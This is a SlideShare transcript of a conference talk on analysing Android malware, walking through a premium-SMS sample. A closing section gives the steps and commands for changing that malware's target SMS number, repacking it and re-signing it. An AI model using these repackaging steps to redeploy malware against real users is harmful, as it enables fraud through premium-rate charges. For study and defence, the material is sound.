SlideShare uma empresa Scribd logo

I haz you and pwn your maal

c0c0n - International Cyber Security and Policing Conference
c0c0n - International Cyber Security and Policing Conference

"I haz you and pwn your maal" by Harsimran Walia @b44nz0r at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html

Tecnologia
1 de 61
Baixar para ler offline
I haz you and pwn your maal Harsimran Walia
#WhoamI • Research Scientist @ McAfee • Expertise: Malware Analysis, Exploit development and Vulnerability Analysis • Twitter: b44nz0r • Email: walia.harsimran@gmail.com • Previous papers: Reversing Microsoft Patches to Reveal Vulnerable code @ NullCon,2012
Disclaimer • The research and views presented here are solely mine and nothing to do with any of the current and previous organizations, I work for or associated with in any form • The presentation is for educational purposes only and no one can be held responsible for any harm caused in any form due to use or misuse of information presented here
Access Data? • Use of smartphones, tablets, mobile devices • No longer need to stay in one place • Information on the go • But,
Danger! • Create a larger attack vector • Treasure trove for attackers • Hot targets for attackers and data thieves • Ease of attack • Vast amount of information
Attacks • Most reliable attack is via malware • Malware can 1. penetrate a host 2. extract information 3. stay hidden 4. send data to the attacker • Attackers created smartphone malware • Delivered as smartphone applications
Platforms • Many smartphone platform – Apple’s iOS – Android – Symbian – Blackberry • Android by far most popular with attackers
Why Android? • 50.1% Smartphone users share in US
Why Android? • 61% smartphone sales share in Q1,2012
Why Android? Starting development of Iphone OS apps needs • Mac Computer • Sign-in Dev Program • Wait for verification • Pay fees
Why Android? • Not only user share, sales are much above any other platform • Huge user base i.e. victims ;) • Ease of malware development and hosting on google play • Have led to:
Headlines • Android OS the “worst platform for malware”. - TG Daily August’11 • Android threats leapt 76% during the Q2-2011 - McAfee • Most attacked mobile OS overtaking Symbian OS • The most popular target for mobile malware developers • Increasing target for cybercriminals
Malware Analysis Windows Vs Android • 2 methods, dynamic and static • Same, dynamic and static • Virtual machine or sandbox is • Virtual machine with used android SDK • Static analysis - reverse engineer the • In many cases static analysis application/malware reveals the malware using tools and techniques to behavior and very little re-create the actual code and algorithm dynamic analysis is required • Have to debug through • Can be decompiled into assembly code to understand readable java code the algorithm
What to expect? • Lab setup, a VM with android SDK installation. • Tools required for the analysis • Static Analysis • Dynamic Analysis • Patching the malware to own it
What not to expect? • How to write an android malware • How to spread it • How to hack Android
Behavioral classification
Types of Android Malware • Mobile Device Data Stealers – most common – aim to acquire different info from the infected device • OS version • product ID • International Mobile Equipment Identity (IMEI) number • International Mobile Subscriber Identity (IMSI) number – This stolen device info is encrypted and sent via HTTP POST to the attacker, can be used for future attacks .
• Rooting-capable – malware infect to gain so-called root privileges – remote users access to files and the devices’ flash memory – With rooting malware drop copies of themselves onto their flash memory – they can’t be detected and consequently deleted by antivirus products
• Premium Service Abusers – hard coded predetermined premium numbers – sends text messages – affected users being charged for sms services • Mobile Device Spies – secretly monitor info stored on infected devices • GPS location • save text and email messages • Like data stealers, sends stolen data to specific URLs via HTTP POST. • focus more on gathering personal data
One-click Billing Fraud
Android One-click Billing Fraud • Mostly active on p0rn and gamer video sites • Trying to view a video triggers a pop-up asking the user to download a malicious app. • Gets the Android user account information, and sends them to the cybercriminals. • Displays a pop-up showing the message – “We haven’t received your payment. Therefore, based on our policy, we will have to charge you if you have not paid yet.” • Also displays the information it stole in order to build credibility for it self, and better convince the victim to pay the amount. • The pop-up is set to show every few minutes and keeps eating your money.
WHY DID I WRITE MY PAPER?
• Malware Analysis, – important part of antimalware companies’ work. • Mobile malware analysis is now equally important. • Effective analysis can be used by law enforcement agencies to catch law breakers – i.e malware authors and attackers • For fun, when you can pwn someone else’s malware and control it. • You get yourself full-blown malware without writing it.
ANDROID MAL-ANALYSIS TOOLS OF TRADE
Tools - Static analysis • Mobile Sandbox: provides static analysis of malware images • IDA pro: Supports Android bytecode in version 6.1 and later • APKInspector: Powerful GUI tool for analyzing Android applications. • Dex2jar: For converting Android’s .dex format to Java’s .class format • Jd-gui: A standalone graphical utility that displays Java source codes of .class files. • Androguard: Reverse engineering and Malware analysis of Android applications. • JAD: Java Decompiler • Dexdump: Java .dex file format decompiler • Smali: smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation.
Tools – Dynamic analysis • Droidbox: An Android Application Sandbox for Dynamic Analysis • The Android SDK: “A software development kit that enables developers to create applications for the Android platform. Using the Android SDK we can create a virtual android device almost identical in functionality and capabilities of an android telephone and using that virtual device as secure environment we can execute the malware and observe the behaviour of it. • AndroidAuditTools: Dynamic Android analysis tools
LAB SETUP
• Traditional malware analysis includes a Virtual Machine • We need a one as well • Android SDK installed in VM • Well documented installation details can be found here http://developer.android.com/sdk/installing.html • Would highlight one thing during installation
• Must select atleast one version of the API • API versions to develop applications for different android versions • Separate SDK for malwares targeted for a particular version • Demo – android 2.3 (gingerbread)
ANALYSIS
Android Malware Acquisition • Contagio MiniDump (http://contagiominidump.blogspot.in/) • Community driven • Anyone can submit a sample • It is made available to others • Demo – Voodoo SimpleCarrierIQDetector – supposed to detect presence of the Carrier IQ mobile diagnostic software on the system – Chosen based on the ease of understanding
STATIC ANALYSIS
Mobile-sandbox.com • Submit the apk to mobile-sandbox.com for analysis • Report generated can be viewed at http://mobilesandbox.org/xml_report_static/?q=176 • Important information from report Requested Permissions from Android Manifest: android.permission.READ_LOGS android.permission.SEND_SMS sendSMS Potentially dangerous Calls: Execution of native code getPackageInfo
Extraction • Start our manual analysis • Need to extract the apk to get its contents • apk file is a zip file formatted package. • Extraction done with win-rar or win-zip • File of interest is classes.dex
dex2jar • C:> dex2jar.bat classes.dex – Output: classes.dex classes_dex2jar.jar • Converts classes.dex file extracted from the apk to jar file
JD-GUI • To read the code from the .class file in the jar • Open the jar file with JD-GUI
• Four .class files – Detect.class • Code is trying to make out if CarrierIQ software is installed on the system based on some checks. – R.class • Every android application contains this class file. Here it is used to declare few variables – Utils.class • Contains few utility method definitions like findFiles. getCommandOutput etc – Main.class • This is the most interesting class as it actually contains the malicious code. • The code looks like this
Code Analysis • Four same command to send SMS to the number “81168” with four different SMS texts – AT37 – MC49 – SP99 – SP93 • A Google search on the number shows that it a premium rate sms number that costs almost € 9/SMS • This is how hackers make money with mobile malware
• Some malware listens to incoming messages • Deletes them even before a user can read it if • They are from the service providers which would inform users about their balance or billing charges.
I haz you • I know the premium rate phone number • Know the text message being sent • If interested in catching the crooks, – find the country and the operator whom the number belongs to – persuade them to disclose the information on the attacker/malware author – Google helps a lot with substantial information available publically regarding the same • If you get the police involved, chances of catching the hax0r are big
Scam • On Google I found a funny but very interesting Facebook scam around this • Like other scam Facebook applications, – a user gets messages from his friends on Facebook asking him to vote for his friend on some “Miss and Mister” contest giving an infected web link – Following the link actually hacks the Facebook account rendering it unusable for the user – Attacker then calls him/her up telling him that his account has been blocked for so and so reason – Hence he has to send an SMS to the mentioned number “81168” with any of the 4 texts – He will receive a code that has to be given to the caller(who is the hacker) to unlock his Facebook account.
PWNIFICATION
• Finished with the analysis • Extracted information on malware author • Lets own the malware and making it dance to our tunes • Following technique explains the process to own the malware we just analyzed – can be fairly generalized
Baksmali • Program used to disassemble the dex files • Disassembles the .dex file to .smali files • Names similar to the .class files • Can be opened in any text-editor • C:> baksmali-0.93.jar –o smali-out classes.dex
• File containing the malicious code – main$1.smali – From main.class, figured out in analysis phase – Open in a text editor
• Change the destination number of the sms – i.e first argument to sendTextMessage function • Set it to your mobile number or any other • Save the file • Demo – changing it to the port number of my android emulator
Smali • Used to compile the .smali files back to .dex file • After making the desired changes to the smali file • Save it, compile all the .smali files together to classes.dex using • C:> smali-0.93.jar smali-out –o classes.dex
Packing • Delete the META-INF folder – contains the SHA1 of the classes.dex – will not match the changed classes.dex file – apk signing information – has to be changed • Private key of original author not available • Have to sign the apk with our private key • With modified classes.dex, pack the files back to a .zip file using any packer utility • Change extension from .zip to .apk
Signing • Mandated by Google for an application (apk) to be signed by the owner/author’s private key • Cannot install on an emulator or a device, if it is not signed • Can use self-signed certificates to sign applications • No certificate authority is needed • To sign we need, – Keytool – Jarsigner
Keytool • Comes as a part of jdk installation • Used to create private key for signing • C:> keytool -genkey -v -keystore my-personal- key.keystore -alias alias_name -keyalg RSA - keysize 2048 -validity 10000 – prompts for passwords for the keystore and key – and the Distinguished Name fields
Jarsigner • Comes as a part of jdk installation • Used to sign the apk with created keystore • C:> jarsigner -verbose -sigalg MD5withRSA - digestalg SHA1 -keystore my-release- key.keystore carrieriq.apk alias_name – modifies the APK in-place – creates META_INF folder with the signing details – APK is now signed
• To verify if the apk is signed • C:> jarsigner –verify -verbose my_ carrieriq.apk alias_name • If signed properly, it outputs “JAR verified” • Voila! • Got ourselves a malware
Playing DYNAMIC ANALYSIS
• Install apk (malware) on the android SDK • To verify the behavior that we modified • Open two instances of the android emulator • Install the new malware on one of them • sms num modified should be the port number of emulator other than with malware install.
• Install and run the app • As soon uninstall button is clicked • SMS gets sent to the other emulator
I pwn your maal • I modified your malware • Customized it to my need • Now I pwn you maal • It will serve me now • ☺ (evil grin)
CONCLUSION
• Overview of how android smartphone OS has become the most popular target for attackers • Describes different types of malware being created for the android platform • Attempts to explain – the lab setup – tools required – the static and dynamic malware analysis – practically analyzing a real premium SMS sending malware
• After analysis – Origin of malware is known – We know how to own the malware • In short “I haz you and pwn your maal”.
Thanks Questions??

Recomendados

I haz you and pwn your maal
I haz you and pwn your maalI haz you and pwn your maal
I haz you and pwn your maalHarsimran Walia
 
I haz you and pwn your maal whitepaper
I haz you and pwn your maal whitepaperI haz you and pwn your maal whitepaper
I haz you and pwn your maal whitepaperHarsimran Walia
 
Reading Group Presentation: Why Eve and Mallory Love Android
Reading Group Presentation: Why Eve and Mallory Love AndroidReading Group Presentation: Why Eve and Mallory Love Android
Reading Group Presentation: Why Eve and Mallory Love AndroidMichael Rushanan
 
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIAnti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIArash Ramez
 
Android App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSecAndroid App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSecDroidConTLV
 
Android Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android ApplicationsAndroid Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android Applicationsh4oxer
 
Hacking your Android (slides)
Hacking your Android (slides)Hacking your Android (slides)
Hacking your Android (slides)Justin Hoang
 
Malware
MalwareMalware
MalwareSetiya Nugroho
 

Recomendados

I haz you and pwn your maal
I haz you and pwn your maalI haz you and pwn your maal
I haz you and pwn your maalHarsimran Walia
 
I haz you and pwn your maal whitepaper
I haz you and pwn your maal whitepaperI haz you and pwn your maal whitepaper
I haz you and pwn your maal whitepaperHarsimran Walia
 
Reading Group Presentation: Why Eve and Mallory Love Android
Reading Group Presentation: Why Eve and Mallory Love AndroidReading Group Presentation: Why Eve and Mallory Love Android
Reading Group Presentation: Why Eve and Mallory Love AndroidMichael Rushanan
 
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIAnti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIArash Ramez
 
Android App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSecAndroid App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSecDroidConTLV
 
Android Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android ApplicationsAndroid Security Overview and Safe Practices for Web-Based Android Applications
Android Security Overview and Safe Practices for Web-Based Android Applicationsh4oxer
 
Hacking your Android (slides)
Hacking your Android (slides)Hacking your Android (slides)
Hacking your Android (slides)Justin Hoang
 
Malware
MalwareMalware
MalwareSetiya Nugroho
 
WEEK5 Mobile Device Security 31032022.pdf
WEEK5 Mobile Device Security 31032022.pdfWEEK5 Mobile Device Security 31032022.pdf
WEEK5 Mobile Device Security 31032022.pdfSetiya Nugroho
 
CNIT 128 Ch 4: Android
CNIT 128 Ch 4: AndroidCNIT 128 Ch 4: Android
CNIT 128 Ch 4: AndroidSam Bowne
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLiphonepentest
 
2014: Mid-Year Threat Review
2014: Mid-Year Threat Review2014: Mid-Year Threat Review
2014: Mid-Year Threat ReviewESET
 
Analysis and research of system security based on android
Analysis and research of system security based on androidAnalysis and research of system security based on android
Analysis and research of system security based on androidRavishankar Kumar
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentationSandeep Joshi
 
Mobile Application Security Code Reviews
Mobile Application Security Code ReviewsMobile Application Security Code Reviews
Mobile Application Security Code ReviewsDenim Group
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile ApplicationsDenim Group
 
Gg2511351142
Gg2511351142Gg2511351142
Gg2511351142IJERA Editor
 
Android system security
Android system securityAndroid system security
Android system securityChong-Kuan Chen
 
CSF18 - For Your Ears Only - Sasha Kranjac
CSF18 - For Your Ears Only - Sasha KranjacCSF18 - For Your Ears Only - Sasha Kranjac
CSF18 - For Your Ears Only - Sasha KranjacNCCOMMS
 
Android malware overview, status and dilemmas
Android malware overview, status and dilemmasAndroid malware overview, status and dilemmas
Android malware overview, status and dilemmasTech and Law Center
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysisJason Ross
 
Stealing sensitive data from android phones the hacker way
Stealing sensitive data from android phones the hacker wayStealing sensitive data from android phones the hacker way
Stealing sensitive data from android phones the hacker wayn|u - The Open Security Community
 
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Stefano Maccaglia
 
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandTyler Shields
 
михаил дударев
михаил дударевмихаил дударев
михаил дударевapps4allru
 
Deep Dive Into Android Security
Deep Dive Into Android SecurityDeep Dive Into Android Security
Deep Dive Into Android SecurityMarakana Inc.
 
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)Sam Bowne
 
Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppAppsecco
 
Playing with shodan
Playing with shodanPlaying with shodan
Playing with shodandecode _dev
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 

Mais conteúdo relacionado

Mais procurados

WEEK5 Mobile Device Security 31032022.pdf
WEEK5 Mobile Device Security 31032022.pdfWEEK5 Mobile Device Security 31032022.pdf
WEEK5 Mobile Device Security 31032022.pdfSetiya Nugroho
 
CNIT 128 Ch 4: Android
CNIT 128 Ch 4: AndroidCNIT 128 Ch 4: Android
CNIT 128 Ch 4: AndroidSam Bowne
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLiphonepentest
 
2014: Mid-Year Threat Review
2014: Mid-Year Threat Review2014: Mid-Year Threat Review
2014: Mid-Year Threat ReviewESET
 
Analysis and research of system security based on android
Analysis and research of system security based on androidAnalysis and research of system security based on android
Analysis and research of system security based on androidRavishankar Kumar
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentationSandeep Joshi
 
Mobile Application Security Code Reviews
Mobile Application Security Code ReviewsMobile Application Security Code Reviews
Mobile Application Security Code ReviewsDenim Group
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile ApplicationsDenim Group
 
CSF18 - For Your Ears Only - Sasha Kranjac
CSF18 - For Your Ears Only - Sasha KranjacCSF18 - For Your Ears Only - Sasha Kranjac
CSF18 - For Your Ears Only - Sasha KranjacNCCOMMS
 
Android malware overview, status and dilemmas
Android malware overview, status and dilemmasAndroid malware overview, status and dilemmas
Android malware overview, status and dilemmasTech and Law Center
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysisJason Ross
 
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Stefano Maccaglia
 
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandTyler Shields
 
михаил дударев
михаил дударевмихаил дударев
михаил дударевapps4allru
 
Deep Dive Into Android Security
Deep Dive Into Android SecurityDeep Dive Into Android Security
Deep Dive Into Android SecurityMarakana Inc.
 
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)Sam Bowne
 
Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppAppsecco
 

Mais procurados (20)

WEEK5 Mobile Device Security 31032022.pdf
WEEK5 Mobile Device Security 31032022.pdfWEEK5 Mobile Device Security 31032022.pdf
WEEK5 Mobile Device Security 31032022.pdf
 
CNIT 128 Ch 4: Android
CNIT 128 Ch 4: AndroidCNIT 128 Ch 4: Android
CNIT 128 Ch 4: Android
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
 
2014: Mid-Year Threat Review
2014: Mid-Year Threat Review2014: Mid-Year Threat Review
2014: Mid-Year Threat Review
 
Analysis and research of system security based on android
Analysis and research of system security based on androidAnalysis and research of system security based on android
Analysis and research of system security based on android
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentation
 
Mobile Application Security Code Reviews
Mobile Application Security Code ReviewsMobile Application Security Code Reviews
Mobile Application Security Code Reviews
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Gg2511351142
Gg2511351142Gg2511351142
Gg2511351142
 
Android system security
Android system securityAndroid system security
Android system security
 
CSF18 - For Your Ears Only - Sasha Kranjac
CSF18 - For Your Ears Only - Sasha KranjacCSF18 - For Your Ears Only - Sasha Kranjac
CSF18 - For Your Ears Only - Sasha Kranjac
 
Android malware overview, status and dilemmas
Android malware overview, status and dilemmasAndroid malware overview, status and dilemmas
Android malware overview, status and dilemmas
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysis
 
Stealing sensitive data from android phones the hacker way
Stealing sensitive data from android phones the hacker wayStealing sensitive data from android phones the hacker way
Stealing sensitive data from android phones the hacker way
 
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.
 
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
 
михаил дударев
михаил дударевмихаил дударев
михаил дударев
 
Deep Dive Into Android Security
Deep Dive Into Android SecurityDeep Dive Into Android Security
Deep Dive Into Android Security
 
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
CNIT 128 6. Analyzing Android Applications (Part 2 of 3)
 
Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your App
 

Destaque

Playing with shodan
Playing with shodanPlaying with shodan
Playing with shodandecode _dev
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Shodan
ShodanShodan
ShodanJ M
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using MeterpreterShubham Mittal
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Asymmetric warfare
Asymmetric warfareAsymmetric warfare
Asymmetric warfareTeeranan
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
Defining asymmetric warfare
Defining asymmetric warfareDefining asymmetric warfare
Defining asymmetric warfareLex Pit
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsSpyglass Security
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
Try harder or go home
Try harder or go homeTry harder or go home
Try harder or go homejaredhaight
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with PythonWill Schroeder
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 

Destaque (20)

Playing with shodan
Playing with shodanPlaying with shodan
Playing with shodan
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Shodan
ShodanShodan
Shodan
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using Meterpreter
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Asymmetric warfare
Asymmetric warfareAsymmetric warfare
Asymmetric warfare
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
 
Defining asymmetric warfare
Defining asymmetric warfareDefining asymmetric warfare
Defining asymmetric warfare
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark Arts
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
Try harder or go home
Try harder or go homeTry harder or go home
Try harder or go home
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with Python
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 

Semelhante a I haz you and pwn your maal

Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By NirmalNIRMAL RAJ
 
Mobile platform security models
Mobile platform security modelsMobile platform security models
Mobile platform security modelsG Prachi
 
Cracking the mobile application code
Cracking the mobile application codeCracking the mobile application code
Cracking the mobile application codeSreenarayan A
 
Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)ClubHack
 
android Security
android Security android Security
android Security darkC0de
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)ClubHack
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoShakacon
 
ISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and PrivacyISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and PrivacyMichael Davis
 
Forensic And Cloud Computing
Forensic And Cloud ComputingForensic And Cloud Computing
Forensic And Cloud ComputingMitesh Katira
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationPriyanka Aash
 
Building a Mobile Security Program
Building a Mobile Security ProgramBuilding a Mobile Security Program
Building a Mobile Security ProgramDenim Group
 
SmartDevCon - Katowice - 2013
SmartDevCon - Katowice - 2013SmartDevCon - Katowice - 2013
SmartDevCon - Katowice - 2013Petr Dvorak
 
Outsmarting SmartPhones
Outsmarting SmartPhonesOutsmarting SmartPhones
Outsmarting SmartPhonessaurabhharit
 

Semelhante a I haz you and pwn your maal (20)

Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By Nirmal
 
Mobile platform security models
Mobile platform security modelsMobile platform security models
Mobile platform security models
 
Cracking the Mobile Application Code
Cracking the Mobile Application CodeCracking the Mobile Application Code
Cracking the Mobile Application Code
 
Cracking the mobile application code
Cracking the mobile application codeCracking the mobile application code
Cracking the mobile application code
 
Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)
 
Android security
Android securityAndroid security
Android security
 
android Security
android Security android Security
android Security
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)
 
You installed what Thierry Sans
You installed what Thierry SansYou installed what Thierry Sans
You installed what Thierry Sans
 
Internet security
Internet securityInternet security
Internet security
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoFruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
 
Brief Tour about Android Security
Brief Tour about Android SecurityBrief Tour about Android Security
Brief Tour about Android Security
 
Securing Android
Securing AndroidSecuring Android
Securing Android
 
